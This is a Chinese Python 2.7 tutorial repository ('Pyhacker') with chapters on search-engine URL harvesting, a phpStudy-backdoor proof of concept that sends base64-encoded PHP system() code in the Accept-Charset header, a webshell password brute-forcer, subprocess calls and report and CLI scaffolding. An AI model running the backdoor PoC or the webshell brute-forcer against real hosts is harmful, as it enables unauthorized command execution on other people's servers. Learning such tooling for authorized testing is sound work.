├── README.md └── books ├── 0x0.md ├── 0x1.md ├── 0x10.md ├── 0x11.md ├── 0x12.md ├── 0x13.md ├── 0x14.md ├── 0x15.md ├── 0x2.md ├── 0x3.md ├── 0x4.md ├── 0x5.md ├── 0x6.md ├── 0x7.md ├── 0x8.md ├── 0x9.md ├── config ├── 1.[Pyhacker]Url采集 │ ├── Bing_url.py │ └── url_demo.gif ├── 10.[Pyhacker]漏洞Poc编写 │ ├── Poc.py │ └── success.txt ├── 11.[Pyhacker]爆破一句话木马 │ ├── Shell.py │ ├── shell.gif │ └── shell.txt ├── 12.[Pyhacker]调用外部命令 │ └── Cmd_powershell.py ├── 13.[Pyhacker]自动生成网页报告 │ ├── Report.gif │ ├── Report.py │ └── jieguo.html ├── 14.[Pyhacker]打造完美命令界面 │ ├── hello_word.exe │ ├── hello_word.py │ ├── ico.ico │ └── test.py ├── 15.[Pyhacker]你可能会用到的模块 │ └── module.py ├── 2.[Pyhacker]网站爬虫 │ ├── Url_depth.py │ └── url_depth.gif ├── 3.[Pyhacker]后台扫描器 │ ├── Dirsearch.py │ ├── dirsearch_demo.gif │ ├── rar.txt │ └── success_dir.txt ├── 4.[Pyhacker]Waf探测 │ ├── Waf.py │ ├── Waf_url.txt │ ├── url.txt │ ├── waf.gif │ └── waf.txt ├── 5.[Pyhacker]Cms识别 │ ├── Cms.py │ ├── cms.gif │ └── cms.txt ├── 6.[Pyhacker]端口扫描 │ ├── Nmap.py │ ├── Portscan.py │ └── portscan.gif ├── 7.[Pyhacker]Sql脚本编写 │ ├── Sql_judge.png │ ├── Sql_judge.py │ ├── andand.py │ └── url.txt ├── 8.[Pyhacker]Xss检测 │ ├── Xss.gif │ └── Xss.py └── 9.[Pyhacker]调用第三方接口 │ ├── Lookup.py │ ├── qq.py │ └── 第三方.gif └── img ├── 1 ├── 1.png ├── 10.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png ├── 2 ├── 1.png ├── 10.png ├── 11.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png ├── 3 ├── 1.png ├── 2.png ├── 3.png ├── 4.png └── 5.png ├── 4 ├── 1.png ├── 10.png ├── 11.png ├── 12.png ├── 13.png ├── 14.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png ├── 5 ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png └── 7.png ├── 6 ├── 1.png ├── 10.png ├── 11.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png ├── 7 ├── 1.png ├── 10.png ├── 11.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png ├── 8 ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png ├── 9 ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png └── 6.png ├── 10 ├── 1.png ├── 2.png └── 3.png ├── 11 ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png └── 6.png ├── 12 ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png └── 6.png ├── 13 └── 1.png ├── 14 ├── 1.png ├── 10.png ├── 11.png ├── 12.png ├── 13.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png └── 15 ├── 1.png ├── 10.png ├── 11.png ├── 12.png ├── 13.png ├── 14.png ├── 15.png ├── 16.png ├── 17.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png ├── 8.png └── 9.png /README.md: -------------------------------------------------------------------------------- 1 | 2 | ## 【Pyhacker】Python安全开发 3 | 4 | ``` 5 | C:\Users\root>python 6 | Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)] on win32 7 | Type "help", "copyright", "credits" or "license" for more information. 8 | 9 | #小陈's Blog:http://www.hackxc.cc 10 | >>> 11 | ``` 12 | 【Pyhacker】很多信息安全爱好者在刚学python的时候,什么都懂,就是不知道怎么写代码,为此出一系列课程,分享思路,开发思维,希望你可以开发自己大的项目! 13 | 14 | 【Pyhacker】环境:Python 2.7 15 | 16 | 【Pyhacker】适合人员:有Python基础 17 | 18 | 19 | 0×0 – [[Pyhacker] 说明](https://github.com/hackxc/Pyhacker/blob/master/books/0x0.md) 20 | 21 | 0×1 – [[Pyhacker] Url采集](https://github.com/hackxc/Pyhacker/blob/master/books/0x1.md) 22 | 23 | 0×2 – [[Pyhacker] 网站爬虫](https://github.com/hackxc/Pyhacker/blob/master/books/0x2.md) 24 | 25 | 0×3 – [[Pyhacker] 后台扫描器](https://github.com/hackxc/Pyhacker/blob/master/books/0x3.md) 26 | 27 | 0×4 – [[Pyhacker] Waf探测](https://github.com/hackxc/Pyhacker/blob/master/books/0x4.md) 28 | 29 | 0×5 – [[Pyhacker] Cms识别](https://github.com/hackxc/Pyhacker/blob/master/books/0x5.md) 30 | 31 | 0×6 – [[Pyhacker] 端口扫描](https://github.com/hackxc/Pyhacker/blob/master/books/0x6.md) 32 | 33 | 0×7 – [[Pyhacker] Sql脚本编写](https://github.com/hackxc/Pyhacker/blob/master/books/0x7.md) 34 | 35 | 0×8 – [[Pyhacker] Xss检测](https://github.com/hackxc/Pyhacker/blob/master/books/0x8.md) 36 | 37 | 0×9 – [[Pyhacker] 调用第三方接口](https://github.com/hackxc/Pyhacker/blob/master/books/0x9.md) 38 | 39 | 0×10 – [[Pyhacker] 漏洞Poc编写](https://github.com/hackxc/Pyhacker/blob/master/books/0x10.md) 40 | 41 | 0×11 – [[Pyhacker] 爆破一句话木马](https://github.com/hackxc/Pyhacker/blob/master/books/0x11.md) 42 | 43 | 0×12 – [[Pyhacker] 调用外部命令](https://github.com/hackxc/Pyhacker/blob/master/books/0x12.md) 44 | 45 | 0×13 – [[Pyhacker] 自动生成网页报告](https://github.com/hackxc/Pyhacker/blob/master/books/0x13.md) 46 | 47 | 0×14 – [[Pyhacker] 打造完美命令界面](https://github.com/hackxc/Pyhacker/blob/master/books/0x14.md) 48 | 49 | 0×15 – [[Pyhacker] 你可能会用到的模块](https://github.com/hackxc/Pyhacker/blob/master/books/0x15.md) 50 | 51 | 52 | 53 | 本文如有错误,请及时提醒,以免误导他人 Email: 758682207@qq.com 54 | -------------------------------------------------------------------------------- /books/0x0.md: -------------------------------------------------------------------------------- 1 | ## [Pyhacker 系列] 2 | 3 | 这套Pyhacker是基于python 2.7进行开发,请先安装python2.7版本。python是目前最热门的语言,他的可移植性,可扩展性,可嵌入性都很强,还拥有丰富的库,所以很多安全从业人员都喜欢用python编写漏洞利用工具。同时很多安全公司都要求至少会一门编程语言并且可编写脚本完成日常需求。学完Pyhacker相信你可以写出自己的漏洞利用工具! 4 | 5 | 6 | 7 | **说明** 8 | 9 | 你需要具备python基础,所有配套脚本均在/config目录下。 10 | 11 | 文章仅抛砖引玉,开发思维,你可以根据自己的需求进行改进,完善扫描器,如果你把Pyhacker学完了,你可以尝试把所有功能组建在一起,并且加入新的功能,完成一个属于自己的自动化扫描器! 12 | 13 | 14 | 15 | **联系作者** 16 | 17 | Name:小陈 18 | 19 | Blog:http://www.hackxc.cc 20 | 21 | Email:758682207@qq.com 22 | 23 | 24 | **本文如有错误,请及时提醒,以免误导他人 Email: 758682207@qq.com** 25 | -------------------------------------------------------------------------------- /books/0x1.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 Url采集 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | import re 10 | 11 | 本文将用re正则进行讲解,如果你用Xpath也可以 12 | 13 | **00x2:** 14 | 15 | 首先我们要选取搜索引擎(其他搜索引擎原理相同) 16 | 17 | 以bing为例:Cn.bing.com 18 | 19 | 首先分析bing翻页机制: 20 | 21 | https://cn.bing.com/search?q=小陈&first=0 第一页 22 | 23 | https://cn.bing.com/search?q=小陈&first=10 第二页 24 | 25 | https://cn.bing.com/search?q=小陈&first=20 第三页 26 | 27 | 页数 = First*10 28 | 29 | 分析完毕,我们来请求看一下 30 | 31 | ``` 32 | def req(): 33 | url = 'https://cn.bing.com/search?q=小陈&first=0' 34 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'} 35 | req = requests.get(url,headers=headers) 36 | html = req.content 37 | print html 38 | ``` 39 | 40 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/1.png) 41 | 42 | Ok,没毛病 43 | 44 | **00x3:** 45 | 46 | 分析需要采集的url在哪个位置 47 | 48 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/2.png) 49 | 50 | 得出正则:(.*?) 51 | 52 | 正则表达式学习:(百度搜:python 正则表达式) 53 | 54 | ``` 55 | def reurl(): 56 | urlr = r'(.*?)' 57 | reurl = re.findall(urlr,html) 58 | print reurl 59 | ``` 60 | 61 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/3.png) 62 | 63 | 就在我请求第二页的时候发现了问题 64 | 65 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/4.png) 66 | 67 | 可以看到请求内容和第一页一样,有某种验证机制 68 | 69 | 一般情况下验证机制,表示特定参数 70 | 71 | 经过多次测试,发现缺少 Cookie: _EDGE_V=1; 72 | 73 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/5.png) 74 | 75 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/6.png) 76 | 77 | 请求正常,大致已经完成 78 | 79 | 接下来只需要给关键词和页数变量就ok了 80 | 81 | **00x4:** 82 | 83 | 再搜索site:baidu.com 又出现了问题 84 | 85 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/7.png) 86 | 87 | 于是修改正则为: 88 | 89 | ```'target="_blank" href="(http.*?\..*?\..*?)" h="'``` 90 | 91 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/8.png) 92 | 93 | 有很多我们不想要的结果,我们再来遍历下采集的urls 94 | 95 | 做一下处理 96 | 97 | 正则为:(http[s]?://.*?)/ 98 | 99 | ``` 100 | def url(): 101 | for url in urls: 102 | urlr = r'(http[s]?://.*?)/' 103 | url = re.findall(urlr,url) 104 | print url 105 | ``` 106 | 107 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/9.png) 108 | 109 | Print url 改为 print url[0] 再进行处理一下 110 | 111 | 可以看到下面还有重复的url,对url去重一下 112 | 113 | 114 | ``` 115 | def qc():#去重复 116 | for url in url_ok: 117 | if url in url_bing: 118 | continue 119 | url_bing.append(url) 120 | ``` 121 | 122 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/1/10.png) 123 | 124 | **00x5:** 125 | 126 | 接下来我们要让他自动保存到url_bing.txt 127 | 128 | 129 | ``` 130 | with open('url_bing.txt','a+')as f: 131 | for url in url_bing: 132 | print url 133 | f.write(url+"\n") 134 | print "Save as url_bing.txt" 135 | ``` 136 | 137 | **00x6:** 138 | 139 | 完整代码:/books/config/1.[Pyhacker]Url采集 140 | 141 | ``` 142 | #!/usr/bin/python 143 | #-*- coding:utf-8 -*- 144 | import requests 145 | import re 146 | 147 | urls = [] 148 | url_ok = [] 149 | url_bing=[] 150 | 151 | def req(q,first): 152 | global html 153 | url = 'https://cn.bing.com/search?q=%s&first=%s'%(q,first) 154 | print url 155 | headers = { 156 | 'Host':'cn.bing.com', 157 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0', 158 | 'Cookie': '_EDGE_V=1;' 159 | } 160 | req = requests.get(url,headers=headers) 161 | html = req.content 162 | 163 | def reurl():#正则匹配url 164 | urlr = r'target="_blank" href="(http.*?\..*?\..*?)" h="' 165 | reurl = re.findall(urlr,html) 166 | for url in reurl: 167 | if url not in urls: 168 | urls.append(url) 169 | 170 | def url():#url二次处理 171 | for url in urls: 172 | urlr = r'(http[s]?://.*?)/' 173 | url = re.findall(urlr,url) 174 | url_ok.append(url[0]) 175 | 176 | def qc():#去重复 177 | for url in url_ok: 178 | if url in url_bing: 179 | continue 180 | url_bing.append(url) 181 | 182 | if __name__ == '__main__': 183 | q = raw_input('\nkey:') 184 | page = input('page:') 185 | for first in range(0, page): 186 | req(q, first * 10) 187 | reurl() 188 | url() 189 | qc() 190 | with open('url_bing.txt','a+')as f: 191 | for url in url_bing: 192 | print url 193 | f.write(url+"\n") 194 | print "Save as url_bing.txt" 195 | ``` 196 | -------------------------------------------------------------------------------- /books/0x10.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 漏洞POC编写 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | import base64 10 | 11 | **00x2:** 12 | 13 | 既然是漏洞poc编写,那么我们肯定要有poc,当然直接exp利用也可以 14 | 15 | 每当爆出新的漏洞,就会有专业大佬进行分析,发出poc,我们直接利用即可 16 | 17 | 第一个例子,拿phpstudy后门为例 18 | 19 | 先了解一下base64模块 20 | 21 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/10/1.png) 22 | 23 | **00x3:** 24 | 25 | 接下来,你需要去了解一下这个后门,网上有很多分析文章 26 | 27 | ``` 28 | Accept-Encoding:gzip,deflate 29 | Accept-Charset:cHJpbnRmKG1kNSgzMzMpKTs= 30 | ``` 31 | 32 | 了解base64你就可以写一个交互式的Exp 33 | 34 | 为了确定漏洞准确度,我们可以直接执行输出一个特定字符 35 | 36 | cHJpbnRmKG1kNSgzMzMpKTs= 37 | 38 | 解码得:printf(md5(333)); 39 | 40 | 这样,网页只有这个md5才会确定存在漏洞,准确度极高 41 | 42 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/10/2.png) 43 | 44 | 这里仅已验证漏洞为例```c3lzdGVtKCJlY2hvIHhjNjY2YSIpOw==``` 45 | 46 | 直接写入了base64验证poc,就不演示交互式的利用了,也是同理 47 | 48 | 核心代码如下: 49 | 50 | ``` 51 | headers = { 52 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0', 53 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 54 | 'Accept-Encoding':'gzip,deflate', 55 | 'Accept-Charset':'c3lzdGVtKCJlY2hvIHhjNjY2YSIpOw==', 56 | 'Accept-Language':'zh-CN,zh;q=0.9', 57 | 'Connection':'close', 58 | } 59 | ``` 60 | 61 | 主要就是Accept-Charset请求头,接着去写一个请求 62 | 63 | ``` 64 | r = requests.get(url=url, headers=headers,timeout=5) 65 | if 'xc666' in r.text: 66 | print u'over success:',url 67 | else: 68 | print u'flase:',url 69 | ``` 70 | 71 | 加上结果自动保存: 72 | 73 | ``` 74 | with open('success.txt','a+') as f: 75 | f.write(url+"\n") 76 | ``` 77 | 78 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/10/3.png) 79 | 80 | 批量检测: 81 | 82 | 只需要修改最后一行,打开文件遍历url即可,前面讲了,这里就不再多说了 83 | 84 | **00x5:** 85 | 86 | 完整代码:/books/config/10.[Pyhacker]漏洞Poc编写 87 | 88 | ``` 89 | #!/usr/bin/python 90 | #-*- coding:utf-8 -*- 91 | import requests 92 | headers = { 93 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0', 94 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 95 | 'Accept-Encoding':'gzip,deflate', 96 | 'Accept-Charset':'c3lzdGVtKCJlY2hvIHhjNjY2YSIpOw==', 97 | 'Accept-Language':'zh-CN,zh;q=0.9', 98 | 'Connection':'close', 99 | } 100 | 101 | def phpstudy(url): 102 | try: 103 | if 'http' not in url: 104 | url = 'http://' + url 105 | r = requests.get(url=url, headers=headers,timeout=5) 106 | if 'xc666' in r.text: 107 | print u'over success:',url 108 | with open('success.txt','a+') as f: 109 | f.write(url+"\n") 110 | else: 111 | print u'flase:',url 112 | except: 113 | print u'连接超时',url 114 | 115 | if __name__ == '__main__': 116 | url = raw_input('\nurl:') 117 | phpstudy(url) 118 | ``` 119 | 120 | **注:** 121 | 122 | 如Sql,Xss等漏洞的Poc,也是一样,直接请求就ok,然后去验证,大同小异 -------------------------------------------------------------------------------- /books/0x11.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 爆破一句话木马 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | **00x2:** 10 | 11 | 首先我们了解一下一句话木马,一般post传递参数 12 | 13 | 一个简单的php一句话木马 14 | 15 | ``` 16 | 19 | ``` 20 | 21 | 先测试一下连接 22 | 23 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/11/1.png) 24 | 25 | OK,没问题,我们用浏览器打开传参看一下 26 | 27 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/11/2.png) 28 | 29 | 由此可以看到密码为x,变量提交能匹配上即执行echo语句 30 | 31 | 这时我猜大家都有了思路,构造post请求即可 32 | 33 | **00x3:** 34 | 35 | 这里我们可以利用网址特性提交多个参数 36 | 37 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/11/3.png) 38 | 39 | 这样可以提高爆破效率 40 | 41 | 分析完成,下面我们开始进行写脚本 42 | 43 | **00x4:** 44 | 45 | 简单爆破shell密码,shell为字典 46 | 47 | ``` 48 | #!/usr/bin/python 49 | #-*- coding:utf-8 -*- 50 | import requests 51 | 52 | def req(url,s): 53 | global html 54 | data = {s:'echo xc666;'} 55 | req = requests.post(url,data=data) 56 | html = req.content 57 | 58 | shell = ['z','y','x'] 59 | for s in shell: 60 | req('http://127.0.0.1/shell.php',s) 61 | if 'xc666' in html: 62 | print "[+]Find password",s 63 | break 64 | ``` 65 | 66 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/11/4.png) 67 | 68 | **00x5:** 69 | 70 | 下面我们按我们刚才说的,一次多个参数,增加效率 71 | 72 | 首先整理一下字典 73 | 74 | ``` 75 | shell = [] 76 | f = open('shell.txt','r') 77 | for x in f.readlines(): #去除换行等字符 78 | x = x.strip() 79 | shell.append(x) 80 | print u"shell密码个数为:",len(shell) 81 | ``` 82 | 83 | ``` 84 | for i in range(0,len(shell),2): #分割列表 85 | b=shell[i:i+2] 86 | print b 87 | ``` 88 | 89 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/11/5.png) 90 | 91 | 我们一次性提交两个参数测试一下 92 | 93 | ``` 94 | data = {s:'echo %s;'%s,ss:'echo %s;'%ss} 95 | 96 | shell = [] 97 | def shelllist(): 98 | f = open('shell.txt','r') 99 | for x in f.readlines(): #去除换行等字符 100 | x = x.strip() 101 | shell.append(x) 102 | print u"shell密码个数为:",len(shell) 103 | ``` 104 | 105 | ``` 106 | def main(): 107 | shelllist() 108 | for i in range(0,len(shell),2): #分割列表 109 | b=shell[i:i+2] 110 | req('http://127.0.0.1/shell.php',b[0],b[1]) 111 | if b[0] in html: 112 | print "[+]Find password",b[0] 113 | break 114 | elif b[1] in html: 115 | print "[+]Find password", b[1] 116 | break 117 | main() 118 | ``` 119 | 120 | 测试一下,一次执行两个密码 121 | 122 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/11/6.png) 123 | 124 | **00x6:** 125 | 126 | 完整代码:/books/config/11.[Pyhacker]爆破一句话木马 127 | 128 | 一次爆破5次密码,可自行调整 129 | 130 | ``` 131 | #!/usr/bin/python 132 | #-*- coding:utf-8 -*- 133 | import requests 134 | 135 | def req(url,s,ss,sss,ssss,sssss): 136 | global html 137 | data = {s:'echo xc666%s;'%s, 138 | ss:'echo xc666%s;'%ss, 139 | sss:'echo xc666%s;'%sss, 140 | ssss:'echo xc666%s;'%ssss, 141 | sssss:'echo xc666%s;'%sssss,} 142 | req = requests.post(url,data=data) 143 | html = req.content 144 | print req.url,s,ss,sss,ssss,sssss 145 | 146 | shell = [] 147 | def shelllist(): 148 | f = open('shell.txt','r') 149 | for x in f.readlines(): #去除换行等字符 150 | x = x.strip() 151 | shell.append(x) 152 | print u"\nshell密码个数为:",len(shell) 153 | 154 | def main(): 155 | shelllist() 156 | url = raw_input('\nshell url:') 157 | if 'http' not in url: 158 | url = 'http://'+url 159 | for i in range(0,len(shell),5): #分割列表 160 | b=shell[i:i+5] 161 | req(url,b[0],b[1],b[2],b[3],b[4]) 162 | if "xc666%s"%b[0] in html: 163 | print "\n[+]Find password",b[0] 164 | break 165 | elif "xc666%s"%b[1] in html: 166 | print "\n[+]Find password", b[1] 167 | break 168 | elif "xc666%s"%b[2] in html: 169 | print "\n[+]Find password",b[2] 170 | break 171 | elif "xc666%s"%b[3] in html: 172 | print "\n[+]Find password", b[3] 173 | break 174 | elif "xc666%s"%b[4] in html: 175 | print "\n[+]Find password", b[4] 176 | break 177 | if __name__ == '__main__': 178 | main() 179 | ``` -------------------------------------------------------------------------------- /books/0x12.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 调用外部命令 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import os 8 | 9 | import subprocess 10 | 11 | **00x2:** 12 | 13 | 除了我们自己编写常用脚本等,还可以调用cmd命令,以及powershell命令来完成我们的需求 14 | 15 | os.system('whoami') 执行cmd命令(有回显) 16 | 17 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/12/1.png) 18 | 19 | os.peop('whoami') 执行cmd命令(无回显) 20 | 21 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/12/2.png) 22 | 23 | **00x3:** 24 | 25 | 我们利用cmd输出C段存活ip探测: 26 | 27 | ```for /l %i in (1,1,255) do @ ping 192.168.1.%i -w 1 -n 1 | find /i "ttl=" ``` 28 | 29 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/12/3.png) 30 | 31 | **00x4:** 32 | 33 | 再来说一下,调用powershell,需要用到subprocess模块 34 | 35 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/12/4.png) 36 | 37 | 当然也是可以调用cmd命令 38 | 39 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/12/5.png) 40 | 41 | args = [r"arp", r"-a"] #命令拼接 42 | 43 | subprocess.call(args) 44 | 45 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/12/6.png) 46 | 47 | **00x5:** 48 | 49 | 完整代码:/books/config/12.[Pyhacker]调用外部命令 50 | 51 | ``` 52 | def main(): 53 | try: 54 | file=raw_input("\nPlease filename:") 55 | line=raw_input("\nDelete rows:") 56 | args = [r"powershell", r"Get-Content %s | Select-Object -Skip %s | Set-Content Newfile.txt"%(file,line)] 57 | subprocess.call(args) 58 | print "\nok!" 59 | except: 60 | sys.exit(0) 61 | if __name__ == '__main__': 62 | main() 63 | ``` 64 | 65 | 利用powershell命令,删除文件前xx行数 66 | 67 | 支持txt,xls等文件,常用于处理大文件时使用 -------------------------------------------------------------------------------- /books/0x13.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 自动生成网页报告 2 | 3 | **00x1:** 4 | 5 | 首先我们需要一个html模板,简单写了一下 6 | 7 | ``` 8 | def jieguo(sql): 9 | global html 10 | html = ''' 11 | 12 | 13 | 14 | 扫描结果 15 | 16 | 17 |
18 |

19 |

扫描结果

20 |
21 |
22 | %s 23 |
24 | 25 | 26 | '''%sql 27 | ``` 28 | 29 | 结果存储到sql,利用%输出 30 | 31 | ps:网上有很多的前端模板,我们也可以进行使用 32 | 33 | **00x2:** 34 | 35 | 接着我们只需要打开文件,把html内容保存到文件即可 36 | 37 | ``` 38 | def main(): 39 | sql = "[+] Find sql http://127.0.0.1/news.php?id=1" 40 | jieguo(sql) 41 | f = open('jieguo.html','w+') 42 | f.write(html) 43 | f.close() 44 | ``` 45 | 46 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/13/1.png) 47 | 48 | **00x3:** 49 | 50 | 完整代码:/books/config/13.[Pyhacker]自动生成网页报告 51 | 52 | ``` 53 | #!/usr/bin/python 54 | #-*- coding:utf-8 -*- 55 | 56 | def jieguo(sql): 57 | global html 58 | html = ''' 59 | 60 | 61 | 62 | 扫描结果 63 | 64 | 65 |
66 |

67 |

扫描结果

68 |
69 |
70 | %s 71 |
72 | 73 | 74 | '''%sql 75 | 76 | def main(): 77 | sql = "[+] Find sql http://127.0.0.1/news.php?id=1" 78 | jieguo(sql) 79 | f = open('jieguo.html','w+') 80 | f.write(html) 81 | f.close() 82 | 83 | if __name__ == '__main__': 84 | main() 85 | print u"Save to jieguo.html" 86 | ``` 87 | 88 | 可以结合前面的思路,把结果输出为html,增加可读性 89 | -------------------------------------------------------------------------------- /books/0x14.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 打造完美命令界面 2 | 3 | **00x1:** 4 | 5 | 相信大家学到这里,已经能够自己写漏洞exp,实现自动化漏洞挖掘,下面我们需要打造完美的界面,方便他人使用。 6 | 7 | **00x2:** 8 | 9 | 大家在运行sqlmap,msf的时候,是不是开始有个很炫酷的图标 10 | 11 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/1.png) 12 | 13 | 我们可以利用figlet来进行生成我们想要的图标 14 | 15 | 此工具kali自带,我们只需打开kali即可(yum install figlet) 16 | 17 | 用法: 18 | 19 | ```figlet hackxc``` 20 | 21 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/2.png) 22 | 23 | figlet hackxc -c 居中显示 24 | 25 | figlet hackxc -w 指定宽度 26 | 27 | figlet -f bubble hackxc 指定字体 28 | 29 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/3.png) 30 | 31 | /usr/share/figlet 所有字体列表 32 | 33 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/4.png) 34 | 35 | 输出之后,我们直接复制,加入到python即可 36 | 37 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/5.png) 38 | 39 | **00x3:** 40 | 41 | 你是不是还看到了一些参数化的工具,是不是觉得很方便 42 | 43 | 如:xxx.py -u http://www.baidu.com 44 | 45 | import optparse #说明模块 46 | 47 | from optparse import OptionParser 48 | 49 | 直接用这个方法就ok,我们直接调用OptionParser方法 50 | 51 | ``` 52 | #!/usr/bin/python 53 | #-*- coding:utf-8 -*- 54 | from optparse import OptionParser 55 | 56 | parser = OptionParser() #实例化对象 57 | 58 | parser.add_option('-u','--url',dest='url',help='help') 59 | #添加,设置参数 help表示参数信息 变量值为url 60 | 61 | (options,args)=parser.parse_args() #把参数值传递给options 62 | url = options.url 63 | print url 64 | ``` 65 | 66 | 假设目标是url,那么我们可以直接利用url=options.url 进行传参 67 | 68 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/6.png) 69 | 70 | 自带--help帮助 71 | 72 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/7.png) 73 | 74 | ``` 75 | usage = ("Usage: test.py -u target") 76 | parser = OptionParser(usage=usage) #实例化对象 77 | ``` 78 | 79 | Usage参数表示用法错误给的提示 80 | 81 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/8.png) 82 | 83 | ``` 84 | if url == None: 85 | print usage 86 | ``` 87 | 88 | 当没有传递参数就进行输出usage 89 | 90 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/9.png) 91 | 92 | Ok,这样一个简单的命令提示和参数赋值就写好了 93 | 94 | 一个小案例:https://github.com/hackxc/Drows 95 | 96 | 调用powershell命令 + optparse说明 + figlet生成的图标 97 | 98 | 如果你可以看懂,那说明你已经对这方面有了掌握 99 | 100 | **00x4:** 101 | 102 | 我们已经完成了 界面开始图标,参数赋值传递,启动说明 103 | 104 | 接下来我们可以把py程序打包为exe,这样的好处是可以不用python环境就可以运行 105 | 106 | 但是值得注意的地方是最好程序不要有中文,防止出错。 107 | 108 | 需要安装: 109 | 110 | ``` 111 | Pywin32, Setuptools, PyInstaller 112 | pip install -i https://pypi.doubanio.com/simple/ PyInstaller 113 | ``` 114 | 115 | -i 指定源安装,官方的安装太慢 116 | 117 | 安装完成后,我们进入到C:\Python27下运行cmd 118 | 119 | 输入pyinstaller,无错误则表示安装ok 120 | 121 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/10.png) 122 | 123 | 下面我们来把一个简单的hello word来打包成exe 124 | 125 | ``` 126 | #!/usr/bin/python 127 | #-*- coding:utf-8 -*- 128 | 129 | print 'hello word' 130 | ``` 131 | 132 | 用法: 133 | 134 | ``` 135 | pyinstaller -F 1.py -i fa.ico 136 | ``` 137 | 138 | -F 文件 -i ico图标 139 | 140 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/11.png) 141 | 142 | 生成后的文件会在dist 目录下 143 | 144 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/12.png) 145 | 146 | 运行测试: 147 | 148 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/14/13.png) 149 | -------------------------------------------------------------------------------- /books/0x15.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 你可能会用到的模块 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下:(仅举例常用方法) 6 | 7 | import random 8 